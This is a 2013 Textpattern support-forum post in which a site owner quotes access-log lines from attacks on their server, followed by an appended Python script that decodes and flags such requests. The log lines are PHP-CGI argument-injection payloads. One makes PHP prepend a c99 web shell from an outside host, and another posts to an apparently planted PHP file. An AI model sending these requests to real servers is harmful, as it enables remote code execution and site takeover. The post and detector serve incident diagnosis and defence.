
Textpattern CMS support forum


#13 2013-10-05 17:09:04

GugUser
Member
From: Quito (Ecuador)
Registered: 2007-12-16
Posts: 1,473

Re: Malicious software on the server

Thanks ruud for your suggestions.

In the meantime I have learned from the hosting provider's support that there were site visits of this type:

188.190.98.18 - - [12/Aug/2013:10:03:13 +0200] "POST /?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 - "-" "Python-urllib/2.6" domain.ch

Converted:

188.190.98.18 - - [12/Aug/2013:10:03:13 +0200] "POST /?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n HTTP/1.1" 200 - "-" "Python-urllib/2.6" domain.ch
78.138.126.92 - - [19/Sep/2013:13:10:07 +0200] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A//creativeresinsdistribution.com/wp-content/themes/twentytwelv/work_c99.log HTTP/1.1" 200 581 "-" "Python-urllib/2.6" domain.ch
144.76.120.153 - - [23/Sep/2013:10:33:00 +0200] "POST /textpattern/theme/4f927.php HTTP/1.0" 200 182 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1" domain.ch

I don’t know what it is for, but support says this was possible because mod_security was disabled, as they noted later.

And that has its origins a few months ago, regarding this topic; these are the same accounts.

Offline
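Added example (not part of the original post): the "Converted" step above, automated over access-log lines, reporting requests whose query string has no unencoded `=` and decodes to `-d name=value` / `-n` style switches like those quoted in the post. The log layout matched by the regex, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed layout: client, two ids, [time], "METHOD target PROTO", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def injected_args(target):
    """Return the argument list a query string decodes to, or [].

    CGI "indexed query" rule (RFC 3875, 4.4): a query with no unencoded '='
    is split on '+' and URL-decoded into command-line arguments.
    """
    _, _, raw = target.partition("?")
    if not raw or "=" in raw:          # ordinary name=value query
        return []
    args = [unquote(tok) for tok in raw.split("+")]
    return args if args[0].startswith("-") else []

def ini_overrides(args):
    """Collect '-d name=value' and '-dname=value' settings from the arguments."""
    found, it = {}, iter(args)
    for arg in it:
        if arg == "-d":
            arg = next(it, "")
        elif arg.startswith("-d"):
            arg = arg[2:]
        else:
            continue                   # other switches such as -n
        name, _, value = arg.partition("=")
        found[name] = value
    return found

def scan(lines):
    """Return one finding per log line whose query decodes to switches."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        args = injected_args(m.group(3)) if m else []
        if args:
            hits.append({"client": m.group(1), "method": m.group(2),
                         "status": m.group(4), "args": args,
                         "ini": ini_overrides(args)})
    return hits

# Constructed sample lines (documentation addresses, not copied from the post)
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "POST /?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6E HTTP/1.1" 200 - "-" "-"',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?-dsafe_mode%3dOff+-dallow_url_fopen%3dOn HTTP/1.1" 200 581 "-" "-"',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?s=article&id=7 HTTP/1.1" 200 4312 "-" "-"',
]
```

A hit with status 200 only shows that the request was answered; whether the settings took effect depends on how PHP is run on the server.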
